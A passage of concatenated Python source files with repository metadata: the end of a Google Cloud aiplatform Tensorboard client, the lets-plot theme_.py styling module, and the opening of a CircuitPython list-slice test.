client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def cancel_operation(
self,
request: Optional[operations_pb2.CancelOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Starts asynchronous cancellation on a long-running operation.
The server makes a best effort to cancel the operation, but success
is not guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
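        A minimal hand-written usage sketch (not a generated sample; the
        operation name below is a placeholder):
        .. code-block:: python
            from google.cloud import aiplatform_v1
            from google.longrunning import operations_pb2
            def sample_cancel_operation():
                # Create a client
                client = aiplatform_v1.TensorboardServiceClient()
                # Initialize request argument(s)
                request = operations_pb2.CancelOperationRequest(
                    name="name_value",
                )
                # Make the request; this method returns None and cancellation is best effort
                client.cancel_operation(request=request)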
Args:
request (:class:`~.operations_pb2.CancelOperationRequest`):
The request object. Request message for
`CancelOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.CancelOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.cancel_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
def wait_operation(
self,
request: Optional[operations_pb2.WaitOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Waits until the specified long-running operation is done or reaches at most
a specified timeout, returning the latest state.
If the operation is already done, the latest state is immediately returned.
If the timeout specified is greater than the default HTTP/RPC timeout, the HTTP/RPC
timeout is used. If the server does not support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
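        A minimal hand-written usage sketch (not a generated sample; the
        operation name below is a placeholder):
        .. code-block:: python
            from google.cloud import aiplatform_v1
            from google.longrunning import operations_pb2
            def sample_wait_operation():
                # Create a client
                client = aiplatform_v1.TensorboardServiceClient()
                # Initialize request argument(s)
                request = operations_pb2.WaitOperationRequest(
                    name="name_value",
                )
                # Make the request; blocks until the operation is done or the timeout elapses
                response = client.wait_operation(request=request)
                # Handle the response
                print(response)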
Args:
request (:class:`~.operations_pb2.WaitOperationRequest`):
The request object. Request message for
`WaitOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.WaitOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.wait_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def set_iam_policy(
self,
request: Optional[iam_policy_pb2.SetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Sets the IAM access control policy on the specified function.
Replaces any existing policy.
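        A minimal hand-written usage sketch (not a generated sample; the
        resource name, role, and member below are placeholders):
        .. code-block:: python
            from google.cloud import aiplatform_v1
            from google.iam.v1 import iam_policy_pb2, policy_pb2
            def sample_set_iam_policy():
                # Create a client
                client = aiplatform_v1.TensorboardServiceClient()
                # Initialize request argument(s)
                request = iam_policy_pb2.SetIamPolicyRequest(
                    resource="resource_value",
                    policy=policy_pb2.Policy(
                        bindings=[
                            policy_pb2.Binding(
                                role="roles/viewer",
                                members=["user:eve@example.com"],
                            ),
                        ],
                    ),
                )
                # Make the request
                response = client.set_iam_policy(request=request)
                # Handle the response
                print(response)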
Args:
request (:class:`~.iam_policy_pb2.SetIamPolicyRequest`):
The request object. Request message for `SetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.SetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.set_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def get_iam_policy(
self,
request: Optional[iam_policy_pb2.GetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Gets the IAM access control policy for a function.
Returns an empty policy if the function exists and does not have a
policy set.
Args:
request (:class:`~.iam_policy_pb2.GetIamPolicyRequest`):
The request object. Request message for `GetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if
any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.GetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.get_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def test_iam_permissions(
self,
request: Optional[iam_policy_pb2.TestIamPermissionsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> iam_policy_pb2.TestIamPermissionsResponse:
r"""Tests the specified IAM permissions against the IAM access control
policy for a function.
If the function does not exist, this will return an empty set
of permissions, not a NOT_FOUND error.
Args:
request (:class:`~.iam_policy_pb2.TestIamPermissionsRequest`):
The request object. Request message for
`TestIamPermissions` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.iam_policy_pb2.TestIamPermissionsResponse:
Response message for ``TestIamPermissions`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.TestIamPermissionsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.test_iam_permissions,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
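# --- Illustrative sketch (not part of the original file): a hypothetical test_iam_permissions call.
# The permission name below is an assumption used only for illustration.
# response = client.test_iam_permissions(
#     request={
#         "resource": "projects/p/locations/us-central1/tensorboards/123",
#         "permissions": ["aiplatform.tensorboards.get"],
#     }
# )
# response.permissions is the subset of the requested permissions the caller actually holds
# (an empty list if the caller holds none of them).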
def get_location(
self,
request: Optional[locations_pb2.GetLocationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.Location:
r"""Gets information about a location.
Args:
request (:class:`~.location_pb2.GetLocationRequest`):
The request object. Request message for
`GetLocation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.Location:
Location object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.GetLocationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.get_location,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def list_locations(
self,
request: Optional[locations_pb2.ListLocationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.ListLocationsResponse:
r"""Lists information about the supported locations for this service.
Args:
request (:class:`~.location_pb2.ListLocationsRequest`):
The request object. Request message for
`ListLocations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.ListLocationsResponse:
Response message for ``ListLocations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.ListLocationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._transport.list_locations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=package_version.__version__
)
__all__ = ("TensorboardServiceClient",)
|
115ac7dd9c19729be33f8a941fe8cea323e8ef5b
|
d01680fe164d915bb3ffd6b10dea1d7cac503630
|
/python-package/lets_plot/plot/theme_.py
|
af03d76c10599eba970dc84223fa5dc242d5fb0c
|
[
"MIT",
"Apache-2.0",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"LGPL-3.0-only"
] |
permissive
|
JetBrains/lets-plot
|
4ba8edd8910967d5e15d8d0ea1a9cd7a9c50432f
|
af4f6554eb9cc250259a6a6757b5c8d920dde8c4
|
refs/heads/master
| 2023-09-01T04:15:04.414149
| 2023-08-31T16:48:57
| 2023-08-31T16:48:57
| 176,771,727
| 1,264
| 59
|
MIT
| 2023-09-07T12:42:01
| 2019-03-20T16:13:03
|
Kotlin
|
UTF-8
|
Python
| false
| false
| 18,310
|
py
|
theme_.py
|
#
# Copyright (c) 2019. JetBrains s.r.o.
# Use of this source code is governed by the MIT license that can be found in the LICENSE file.
#
from .core import FeatureSpec
__all__ = [
'theme',
'element_blank',
"element_line",
'element_rect',
'element_text',
'margin',
'element_geom',
]
def theme(*,
line=None,
rect=None,
text=None,
title=None,
# ToDo: aspect.ratio
axis=None,
axis_ontop=None, axis_ontop_x=None, axis_ontop_y=None,
axis_title=None, axis_title_x=None, axis_title_y=None,
# ToDo: axis.title.x.top, axis.title.x.bottom
# ToDo: axis.title.y.left, axis.title.y.right
axis_text=None, axis_text_x=None, axis_text_y=None,
# ToDo: axis.text.x.top, axis.text.x.bottom
# ToDo: axis.text.x.left, axis.text.x.right
axis_ticks=None, axis_ticks_x=None, axis_ticks_y=None,
# ToDo: axis.ticks.x.top, axis.ticks.x.bottom
# ToDo: axis.ticks.x.left, axis.ticks.x.right
axis_ticks_length=None, axis_ticks_length_x=None, axis_ticks_length_y=None,
axis_line=None, axis_line_x=None, axis_line_y=None,
# ToDo: axis.line.x.top, axis.line.x.bottom
# ToDo: axis.line.x.left, axis.line.x.right
legend_background=None,
legend_text=None, legend_title=None,
legend_position=None, legend_justification=None, legend_direction=None,
# ToDo: other legend options...
panel_background=None,
panel_border=None,
# ToDo: other panel options...
panel_grid=None,
panel_grid_major=None,
panel_grid_minor=None,
panel_grid_major_x=None,
panel_grid_minor_x=None,
panel_grid_major_y=None,
panel_grid_minor_y=None,
plot_background=None,
plot_title=None,
plot_subtitle=None,
plot_caption=None,
strip_background=None, # ToDo: x/y
strip_text=None, # ToDo: x/y
# ToDo: strip.placement
axis_tooltip=None, axis_tooltip_x=None, axis_tooltip_y=None,
axis_tooltip_text=None, axis_tooltip_text_x=None, axis_tooltip_text_y=None,
tooltip=None,
tooltip_text=None, tooltip_title_text=None,
geom=None
):
"""
Use `theme()` to modify individual components of a theme,
allowing you to control all non-data components of the plot.
Parameters
----------
line : str or dict
All line elements.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify line parameters.
rect : str or dict
All rectangular elements.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_rect()` to specify rectangular element parameters.
text : str or dict
All text elements.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify text parameters.
title : str or dict
All title elements: plot, axes, legends.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify title text parameters, inherited from `text`.
axis : str or dict
All axis elements: lines, ticks, texts, titles.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify axes parameters.
axis_ontop, axis_ontop_x, axis_ontop_y : bool, default=False
Option to place axis (lines, tickmarks and labels) over the data layers.
axis_title, axis_title_x, axis_title_y : str or dict
Labels of axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify axes label parameters.
`axis_title_*` inherits from `axis_title` which inherits from `text`.
axis_text, axis_text_x, axis_text_y : str or dict
Tick labels along axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify all axes tick label parameters.
`axis_text_*` inherits from `axis_text` which inherits from `text`.
axis_ticks, axis_ticks_x, axis_ticks_y : str or dict
Tick marks along axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify all tick mark parameters.
`axis_ticks_*` inherits from `axis_ticks` which inherits from `line`.
axis_ticks_length, axis_ticks_length_x, axis_ticks_length_y : float
Length of tick marks in px.
axis_line, axis_line_x, axis_line_y : str or dict
Lines along axes.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_line()` to specify line parameters along all axes.
`axis_line_*` inherits from `axis_line` which inherits from `line`.
legend_background : str or dict
Background of legend.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify legend background parameters, inherited from `rect`.
legend_text : str or dict
Legend item labels.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify legend item label parameters, inherited from `text`.
legend_title : str or dict
Title of legend.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify legend title parameters, inherited from `title`.
legend_position : {'none', 'left', 'right', 'bottom', 'top'} or list
The position of legends. To remove the plot legend, use the 'none' value.
If parameter is a list, then it should be a two-element numeric vector,
each value of float type between 0 and 1.
legend_justification : str or list
Anchor point for positioning legend. If parameter is a list, then
it should be a two-element numeric vector. The pair [0, 0] corresponds to the
bottom left corner, the pair [1, 1] corresponds to the top right.
For string parameter the only possible value is 'center'.
legend_direction : {'horizontal', 'vertical'}
Layout of items in legends.
panel_background : str or dict
Background of plotting area.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify plotting area background parameters, inherited from `rect`.
panel_border : str or dict
Border around plotting area.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify border parameters, inherited from `rect`.
panel_grid, panel_grid_major, panel_grid_minor, panel_grid_major_x, panel_grid_major_y, panel_grid_minor_x, panel_grid_minor_y : str or dict
Grid lines. Specify major grid lines or minor grid lines separately if needed.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_line()` to specify grid line parameters.
`panel_grid_*_*` inherits from `panel_grid_*` which inherits from `panel_grid`,
which in turn inherits from `line`.
plot_background : str or dict
Background of the entire plot.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify plot background parameters, inherited from `rect`.
plot_title : str or dict
Plot title.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify plot title parameters, inherited from `title`.
plot_subtitle : str or dict
Plot subtitle.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify plot subtitle parameters, inherited from `plot_title` or `title`.
plot_caption : str or dict
Plot caption.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify plot caption parameters, inherited from `title`.
strip_background : str or dict
Background of facet labels.
Set 'blank' or result of `element_blank()` to draw nothing.
Set `element_rect()` to specify facet label background parameters, inherited from `rect`.
strip_text : str or dict
Facet labels.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify facet label parameters, inherited from `text`.
axis_tooltip, axis_tooltip_x, axis_tooltip_y : str or dict
Axes tooltips.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_rect()` to specify axes tooltip parameters.
`axis_tooltip_*` inherits from `axis_tooltip` which inherits from `rect`.
axis_tooltip_text, axis_tooltip_text_x, axis_tooltip_text_y : str or dict
Text in axes tooltips.
Set 'blank' or result of `element_blank()` to draw nothing and assign no space.
Set `element_text()` to specify axes text tooltip parameters.
`axis_tooltip_text_*` inherits from `axis_tooltip_text` which inherits from `tooltip_text`.
tooltip : str or dict
General tooltip.
Set `element_rect()` to specify tooltip rectangular parameters, inherited from `rect`.
tooltip_text : str or dict
Text in general tooltip.
Set `element_text()` to specify tooltip text parameters.
tooltip_title_text: str or dict
Tooltip title text.
Set `element_text()` to specify tooltip title parameters, inherited from `tooltip_text`. Bold by default.
geom: dict
Geometry colors.
Set `element_geom()` to specify new values for the named colors.
Returns
-------
`FeatureSpec`
Theme specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 11-16
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
n = 100
np.random.seed(42)
x = np.random.normal(size=n)
c = np.random.choice(['a', 'b', 'c'], size=n)
ggplot({'x': x, 'class': c}, aes('x')) + \\
geom_density(aes(color='class'), size=2) + \\
ggtitle('Density of classes') + \\
theme(axis_line=element_line(size=4), \\
axis_ticks_length=10, \\
axis_title_y='blank', \\
legend_position=[1, 1], legend_justification=[1, 1], \\
panel_background=element_rect(color='black', fill='#eeeeee', size=2), \\
panel_grid=element_line(color='black', size=1))
|
.. jupyter-execute::
:linenos:
:emphasize-lines: 14-19
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
n = 1000
np.random.seed(42)
p = np.random.uniform(size=7)
x = np.random.choice(range(p.size), p=p/p.sum(), size=n)
c = np.random.choice(['a', 'b', 'c'], p=[.5, .3, .2], size=n)
ggplot({'x': x, 'class': c}) + \\
geom_bar(aes('x', fill='x')) + \\
scale_y_continuous(breaks=list(range(0, 151, 25))) + \\
scale_fill_discrete() + \\
facet_grid(y='class') + \\
theme(axis_line_x='blank', \\
axis_ticks=element_line(color='white'), \\
panel_grid_major_x='blank', \\
strip_background=element_rect(color='black', fill='white'), \\
axis_tooltip=element_rect(color='black', fill='white'), \\
legend_position='top')
"""
filtered = _filter_none(locals())
return FeatureSpec('theme', name=None, **filtered)
def _filter_none(original: dict) -> dict:
def _filter_val(value):
if isinstance(value, dict):
return _filter_none(value)
else:
return value
return {k: _filter_val(v) for k, v in original.items() if v is not None}
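# Illustrative example (not part of the original file) of what _filter_none does:
# _filter_none({'line': None, 'text': {'size': 12, 'color': None}, 'blank': False})
# returns {'text': {'size': 12}, 'blank': False} -- None values are dropped at every
# nesting level, while non-None values such as False are kept.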
def element_blank() -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(axis_title_x=element_blank(), axis_ticks=element_blank())
"""
return dict(blank=True)
def element_rect(
fill=None,
color=None,
size=None,
# ToDo: linetype
blank=False,
) -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws borders and backgrounds.
Parameters
----------
fill : str
Fill color.
color : str
Border color.
size : int
Border size.
blank : bool, default=False
If True - draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(panel_background=element_rect())
"""
return locals()
def element_line(
color=None,
size=None,
# ToDo: linetype, lineend, arrow
blank=False,
) -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws lines.
Parameters
----------
color : str
Line color.
size : int
Line size.
blank : bool, default=False
If True - draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(panel_grid=element_line(size=3))
"""
return locals()
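# Illustrative note (not part of the original file): element_line(), element_rect() and
# element_text() simply return their local arguments as a dict, e.g.
# element_line(color='red', size=2) == {'color': 'red', 'size': 2, 'blank': False},
# which theme() then filters for None values and forwards inside the FeatureSpec.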
def element_text(
color=None,
family=None,
face=None,
size=None,
angle=None,
# ToDo: lineheight
hjust=None,
vjust=None,
margin=None,
blank=False,
) -> dict:
"""
Specify how non-data components of the plot are drawn.
This theme element draws texts.
Parameters
----------
color : str
Text color.
family : str
Font family.
face : str
Font face ("plain", "italic", "bold", "bold_italic").
size : int
Text size in pt.
angle : float
Angle to rotate the text (in degrees).
hjust : float
Horizontal justification (in [0, 1]).
0 - left-justified
1 - right-justified
0.5 - center-justified
Can be used with values out of range, but behaviour is not specified.
vjust : float
Vertical justification (in [0, 1]).
0 - bottom-justified
1 - top-justified
0.5 - middle-justified
Can be used with values out of range, but behaviour is not specified.
margin : `margin`
Margins around the text. See `margin()` for more details.
blank : bool, default=False
If True - draws nothing, and assigns no space.
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(axis_text=element_text(color='#bdbdbd'))
"""
return locals()
def margin(t=None, r=None, b=None, l=None) -> dict:
"""
Dimensions of each margin.
Parameters
----------
t : float
Top margin.
r : float
Right margin.
b : float
Bottom margin.
l : float
Left margin.
Returns
-------
`dict`
Margins specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram() + \\
theme(axis_title=element_text(margin=margin(t=10,r=10,b=4,l=4)))
"""
return locals()
def element_geom(
pen=None,
brush=None,
paper=None,
# ToDo: fatten
) -> dict:
"""
Specify new values for the named colors.
Parameters
----------
pen : str
Color to use by name "pen".
brush : str
Color to use by name "brush".
paper : str
Color to use by name "paper".
Returns
-------
`dict`
Theme element specification.
Examples
--------
.. jupyter-execute::
:linenos:
:emphasize-lines: 7
import numpy as np
from lets_plot import *
LetsPlot.setup_html()
np.random.seed(42)
data = {'x': np.random.normal(size=1000)}
ggplot(data, aes(x='x')) + geom_histogram(color='pen', fill='paper') + \\
theme(geom=element_geom(pen='dark_blue', paper='light_blue'))
"""
return locals()
|
e5b24979f06312d08f923b6bb31f8c621fc4bae5
|
83b8b30ebb633eecd29ca0a7a20cc43a293c9333
|
/tests/basics/list_slice_assign.py
|
885615717232ada1e94b725db2a0629a589dd51f
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
adafruit/circuitpython
|
430ec895149d1eb814b505db39b4977a35ee88a7
|
506dca71b0cbb7af749bb51f86b01021db5483b3
|
refs/heads/main
| 2023-08-21T16:30:46.781068
| 2023-08-20T00:39:44
| 2023-08-20T00:39:44
| 66,166,069
| 3,806
| 1,560
|
MIT
| 2023-09-14T19:23:51
| 2016-08-20T20:10:40
|
C
|
UTF-8
|
Python
| false
| false
| 621
|
py
|
list_slice_assign.py
|
# test slices; only 2 argument version supported by MicroPython at the moment
x = list(range(10))
# Assignment
l = list(x)
l[1:3] = [10, 20]
print(l)
l = list(x)
l[1:3] = [10]
print(l)
l = list(x)
l[1:3] = []
print(l)
l = list(x)
del l[1:3]
print(l)
l = list(x)
l[:3] = [10, 20]
print(l)
l = list(x)
l[:3] = []
print(l)
l = list(x)
del l[:3]
print(l)
l = list(x)
l[:-3] = [10, 20]
print(l)
l = list(x)
l[:-3] = []
print(l)
l = list(x)
del l[:-3]
print(l)
# assign a tuple
l = [1, 2, 3]
l[0:1] = (10, 11, 12)
print(l)
# RHS of slice must be an iterable
try:
[][0:1] = 123
except TypeError:
